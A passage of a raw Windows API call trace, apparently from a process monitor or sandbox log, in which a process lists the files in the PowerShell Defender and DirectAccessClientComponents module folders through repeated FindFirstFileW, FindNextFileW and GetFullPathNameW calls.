ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.762] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender.psd1", cAlternateFileName="")) returned 1 [0264.762] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpComputerStatus.cdxml", cAlternateFileName="")) returned 1 [0264.762] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8f67, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpPreference.cdxml", cAlternateFileName="")) returned 1 [0264.762] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpScan.cdxml", cAlternateFileName="")) returned 1 [0264.762] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpSignature.cdxml", cAlternateFileName="")) returned 1 [0264.762] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x597, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreat.cdxml", cAlternateFileName="")) returned 1 [0264.762] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatCatalog.cdxml", cAlternateFileName="")) returned 1 [0264.763] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatDetection.cdxml", cAlternateFileName="")) returned 1 [0264.763] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 1 [0264.763] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.763] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.763] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0264.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.763] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.763] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0264.763] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", lpFilePart=0x0) returned 0x3c [0264.763] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.764] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.764] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender.psd1", cAlternateFileName="")) returned 1 [0264.764] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpComputerStatus.cdxml", cAlternateFileName="")) returned 1 [0264.764] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8f67, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpPreference.cdxml", cAlternateFileName="")) returned 1 [0264.764] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpScan.cdxml", cAlternateFileName="")) returned 1 [0264.764] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpSignature.cdxml", cAlternateFileName="")) returned 1 [0264.765] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x597, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreat.cdxml", cAlternateFileName="")) returned 1 [0264.765] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatCatalog.cdxml", cAlternateFileName="")) returned 1 [0264.765] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatDetection.cdxml", cAlternateFileName="")) returned 1 [0264.765] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 1 [0264.765] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 0 [0264.765] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.765] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1")) returned 0x20 [0264.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.766] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0264.766] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", lpFilePart=0x0) returned 0x50 [0264.766] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.766] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.766] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents.psd1", cAlternateFileName="")) returned 1 [0264.767] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f81, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.cdxml", cAlternateFileName="")) returned 1 [0264.767] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0264.767] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2af, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.types.ps1xml", cAlternateFileName="")) returned 1 [0264.767] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.cdxml", cAlternateFileName="")) returned 1 [0264.767] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x776, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.format.ps1xml", cAlternateFileName="")) returned 1 [0264.767] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 1 [0264.768] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 0 [0264.768] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.768] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0264.768] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", lpFilePart=0x0) returned 0x50 [0264.768] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.768] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.769] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents.psd1", cAlternateFileName="")) returned 1 [0264.769] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f81, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.cdxml", cAlternateFileName="")) returned 1 [0264.769] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0264.769] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2af, dwReserved0=0x0, dwReserved1=0x0, 